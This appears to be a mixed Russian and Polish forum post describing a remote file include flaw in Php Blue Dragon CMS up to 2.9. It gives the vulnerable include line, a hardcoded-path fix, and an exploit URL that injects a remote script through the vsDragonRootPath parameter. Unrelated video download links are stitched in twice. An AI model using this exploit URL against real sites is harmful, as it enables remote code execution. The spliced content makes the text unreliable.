Php Blue Dragon CMS <= 2.9 Remote File Include Vulnerability
Fix:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Видео:
с рапиды
Скачать|Download
с мегаплода
Скачать|Download
приятного просмотра и прослушивания(dj-spookY => b-side most wanted) =)
Код:
// Szukanie u.ytkownika
include($vsDragonRootPath."public_includes/pub_language/".$UserSession
-> SessionData["SesUserLanguage"]."/mod_privmsg.".$phpExt);
Fix:
Код:
// Szukanie u.ytkownika
$vsDragonRootPath = "./";
include($vsDragonRootPath."public_includes/pub_language/".$UserSession
-> SessionData["SesUserLanguage"]."/mod_privmsg.".$phpExt);
Код:
http://www.site.com/[dragon_path]/public_includes/pub_popup/popup_finduser.php?vsDragonRootPath=[evil_scripts]
с рапиды
Скачать|Download с мегаплода
Скачать|Downloadприятного просмотра и прослушивания(dj-spookY => b-side most wanted) =)